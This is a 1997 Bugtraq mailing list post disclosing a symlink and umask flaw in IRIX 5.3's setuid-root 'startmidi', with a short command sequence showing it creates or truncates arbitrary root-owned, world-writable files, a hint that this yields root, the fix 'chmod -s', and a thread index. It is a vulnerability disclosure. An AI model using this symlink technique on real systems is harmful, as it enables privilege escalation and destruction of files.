Bugtraq mailing list archives

IRIX: Bug in startmidi

From: hedley () CS BRIS AC UK (David Hedley)
Date: Sun, 9 Feb 1997 18:11:45 +0000


Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I
noticed a little suid-root program called 'startmidi' which hides in
/usr/sbin. When run, this program creates various files in /tmp. You
guessed it, it respects umask and follows symlinks. Comme ca:

% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw-    1 root     pgrad          0 Feb  9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1
%

Any existing files are trucated to zero length. New files are created
root-owned, mode 0666. I leave it to your furtive imaginations to get
root from this. 'stopmidi' removes the files created by 'startmidi' so
you may have to run that first if /tmp/.midipid already exists.

chmod -s /usr/sbin/startmidi fixes this problem.

My apologies if this has been documented before but I couldn't find it
anywhere on file and I don't remember it being posted to this list.

Regards,

David
--
 David Hedley (hedley () cs bris ac uk)
 finger hedley () cs bris ac uk for PGP key
 Computer Graphics Group | University of Bristol | UK

Current thread:

Re: [linux-security] Re: Linux virus, (continued)
- - Re: [linux-security] Re: Linux virus Alan Cox (Feb 05)
  - Re: [linux-security] Re: Linux virus Leejay Wu (Feb 05)
- bliss version 0.4.0 nobody () INTERNIC NET (Feb 05)
- HPSBUX9702-052 Security Vulnerability in the rlogin executable Aleph One (Feb 05)
- [linux-security] Re: Linux virus Aleph One (Feb 06)
- setlocale() bug in all released versions of FreeBSD (SA-97:01) Aleph One (Feb 06)
- Wierd behavior of MS's NT4 DNS Jason T. Luttgens (Feb 07)
- New OFFICIAL patch for BSD/OS 2.1 (*SECURITY*) (fwd) Josh Gilliam (Feb 07)
- Bliss: The Facts Jared Mauch (Feb 08)
- view-source myst (Feb 08)
- IRIX: Bug in startmidi David Hedley (Feb 09)
  - Re: IRIX: Bug in startmidi Nafees Bin Zafar (Feb 09)
  - Security Advisory: A simple TCP spoofing attack Oliver Friedrichs (Feb 09)
    - Re: Security Advisory: A simple TCP spoofing attack Wietse Venema (Feb 12)
    - buffer overflow in configurable fingerd? M Shariful Anam (Feb 12)
    - Re: buffer overflow in configurable fingerd? Ken Hollis (Feb 12)
    - Security Bulletins Digest Aleph One (Feb 13)
    - Linux NLSPATH buffer overflow solar () IDEAL RU (Feb 13)
    - Re: Linux NLSPATH buffer overflow Alan Cox (Feb 14)
    - CIAC Bulletin H-27: HP-UX vgdisplay Buffer Overrun Vulnerability Aleph One (Feb 15)
    - screen 3.05.02 Khelbin Sunvold (Feb 15)

(Thread continues...)